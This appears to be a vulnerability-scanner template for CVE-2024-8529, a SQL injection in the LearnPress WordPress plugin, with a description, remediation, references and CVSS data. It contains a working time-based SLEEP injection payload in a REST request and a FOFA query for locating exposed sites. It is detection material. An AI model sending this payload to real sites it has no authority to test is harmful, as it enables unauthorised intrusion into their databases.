The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
PoC代码[已公开]
id: CVE-2024-8529
info:
name: LearnPress < 4.2.7.1 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
remediation: |
Update the LearnPress plugin to version 4.2.7.1 or later.
reference:
- https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
- https://nvd.nist.gov/vuln/detail/CVE-2024-8529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8529
cwe-id: CWE-89
epss-score: 0.68004
epss-percentile: 0.98546
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
fofa-query: body="wp-content/plugins/learnpress"
vendor: thimpress
product: learnpress
tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev
http:
- raw:
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- contains_all(body, 'id\":', 'name\":')
condition: and
# digest: 490a00463044022079fdabd2e011c5387727cb5cb71dce0515b2572048f4c1afccb4fbcb45215ffc0220673650d651159105bada010a49ebfd3e796e549c0fc596ed5cc98812d6f3b93a:922c64590222798bb761d5b6d8e72950